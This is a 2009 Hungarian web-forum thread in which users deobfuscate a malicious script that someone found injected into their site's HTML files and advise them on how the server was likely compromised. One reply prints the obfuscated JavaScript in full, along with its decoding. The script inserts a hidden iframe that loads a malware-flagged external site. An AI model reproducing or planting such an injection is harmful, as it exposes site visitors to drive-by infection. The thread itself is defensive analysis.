Keresés: - PHP programozás - LOGOUT Hozzászólások

Hirdetés

Legfrissebb anyagok

LOGOUT témák

PROHARDVER! témák

Mobilarena témák

IT café témák

GAMEPOD témák

Keresés

Új hozzászólás Aktív témák

#2931 fordfairlane veterán eziskamu #2928

Új Válasz 2009-08-11 19:56:31 #2931
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

fordfairlane

veterán

válasz eziskamu #2928 üzenetére

Értem. Nem tudok újat mondani, innentől a szerver üzemeltetőjének kellene szétnéznie.
#2930 lezso6 HÁZIGAZDA eziskamu #2929

Új Válasz 2009-08-11 19:38:15 #2930
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra
Privát üzenet küldése

lezso6

HÁZIGAZDA

LOGOUT blog

válasz eziskamu #2929 üzenetére

Hát aki olyat használ, az meg is érdemli
#2927 cucka addikt eziskamu #2923

Új Válasz 2009-08-11 17:05:52 #2927
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra
Privát üzenet küldése

cucka

addikt

válasz eziskamu #2923 üzenetére

Ez egy javascript kód. Ha <script> és </script> közé teszed, akkor lefut, különben ki lesz írva a képernyőre mint szöveg.
Amúgy nem egy nagy cucc visszafejteni, deklarál egy csomó változót, amiben 1-2 betű található, majd ezeket összekonkatenálja és a következőket csinálja:
- létrehoz egy iframe-et
- beállítja az src, a width, a height paramétereket, valamint a style-ját display:none-ra állítja.
- a body-hoz hozzáadja az iframe-et az appendChild metódussal
Azt meg nézd meg te, hogy mit van azon az oldalon, nálam itt véget ért a kisérletezési kedv .Gondolom valamilyen eltérítés más oldalra, esetleg jelszólopás, ilyesmi. Amúgy ezt a technikát hívják úgy, hogy cross site scripting (xss).
Mod: látom, közben megelőztetek
#2926 fordfairlane veterán eziskamu #2923

Új Válasz 2009-08-11 17:03:11 #2926
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

fordfairlane

veterán

válasz eziskamu #2923 üzenetére

Ez az index.html-ben működőképes?
Így önmagában nem, csak ha <script></script> tagok közé rakod az általad bemásolt kódot, vagy .js fájlba, amire egy html oldal hivatkozik.
Van fent kettő is, mert két oldal van egy tárhelyen, az egyikben az oldalon megjelent szövegként, a másikon meg nem. A másikban aktív lehetett?
Bocs, ezt most nem értem.
#2925 PazsitZ addikt eziskamu #2920

Új Válasz 2009-08-11 17:02:57 #2925
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra
Privát üzenet küldése

PazsitZ

addikt

válasz eziskamu #2920 üzenetére

Fárasztó egy javascript kód:
wy='t'; ya='mp'; yu='p:'; qs='sr'; d='nit'; l='ame'; v='c'; z='t'; ow='io'; zt='n/'; sc='n'; o='//z'; hy='cha'; hg='h'; p='.c'; j='ifr'; f='e'; dx=j.concat(l); // dx=iframe lr=qs.concat(v); // lr=src ua=hg.concat(wy,z,yu,o,f,d,hy,ya,ow,sc,p,zt); // http://zenitchampion.cn/ var dj=document.createElement(dx); // document.createElement(iframe); dj.setAttribute('width','5'); // dj.setAttribute('height','5'); // dj.setAttribute('style','display:none'); // dj.setAttribute(lr,ua); // dj.setAttribute('src','http://zenitchampion.cn/'); document.body.appendChild(dj); // beilleszti a body végére: <iframe width="5" height="5" style="display:none;" src="http://zenitchampion.cn/">
persze ezek csak akkor futnak le ha <script> tag között vannak.
A lényege, hogy beilleszti a body végére a következő html kódot (egy nem látható iframe-t a fent említett oldalről):
<iframe width="5" height="5" style="display:none;" src="fent említett oldal">
Amire nekem az avast rögtön támadást érzékel (JS:ScriptPE-inf [Trj]) már csak a cím google-al való rákereséssel is.
#2922 cucka addikt eziskamu #2920

Új Válasz 2009-08-11 16:55:26 #2922
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra
Privát üzenet küldése

cucka

addikt

válasz eziskamu #2920 üzenetére

A kód javascript, csinál egy rejtett iframe-et, ami a http://zenitchampion.cn oldalra mutat.
Azért néz így ki, hogy ne vedd észre elsőre, hogy mit csinál, ne legyen érthető a kód, ezt külföldiül obfuscation-nek hívják.
#2921 fordfairlane veterán eziskamu #2920

Új Válasz 2009-08-11 16:50:32 #2921
Új hozzászólás
Összes hozzászólása itt Válaszok az összes hozzászólására itt Válaszok erre a hozzászólásra

fordfairlane

veterán

válasz eziskamu #2920 üzenetére

Ez javascript genyóság, időm most nincs tesztelni, hogy pontosan mit is csinál, valamit a böngészővel kavar, talán átirányítja máshova. Ha egy html fájlban találtad az azt jelenti, hogy a támadó fájlokat tud írni a szerveren. Ez két módon lehetséges:
Név/Jelszót szerzett, és valami fájlátviteli protokollal (FTP, SCP, SFTP) képes felülírni a szerveren.
Van egy webes script, amiben van valamiféle bug, amit kihasználva fájlokat lehet felülírni.
Érdemes kinyomozni, melyikről lehet szó, illetve jelszót változtatni nem árt.